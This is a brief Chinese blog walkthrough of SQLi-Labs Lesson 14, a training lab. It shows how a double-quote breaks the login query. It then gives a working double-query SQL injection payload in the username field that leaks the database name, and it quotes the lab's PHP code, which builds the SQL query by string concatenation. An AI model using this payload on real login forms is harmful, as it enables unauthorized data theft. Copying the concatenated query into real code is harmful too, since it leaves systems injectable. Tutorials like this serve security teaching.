SQLi Labs Lesson14

    xiaoxiao2025-05-22  10

    Lesson-14

    Double Injection - Single quotes - String - With twist

    首先进入欢迎界面。

    构造如图所示表单:

    点击提交后没有任何错误信息。

    将上图中的单引号改为双引号

    重新提交表单:

    发现报错了。

    分析原因应该是我们加入的双引号,导致$username后面的双引号和¥password前的双引号闭合了,导致$password后面的那个双引号没有闭合。

    构造如下表单:

    点击Submit后,结果如图:

    但是还是没有提供任何信息。

    还是利用Double Injection。

    username为:

    foo" union select count(*),concat(database(), '#' , floor (rand()*2))as a from information_schema.tables group by a; password任意。

    刷新多次后得到:

    得到数据库名称为security。

    同理还可以得到其他信息。

    最后后台php源码:

    $uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

    转载请注明原文地址: https://ju.6miu.com/read-1299142.html
    最新回复(0)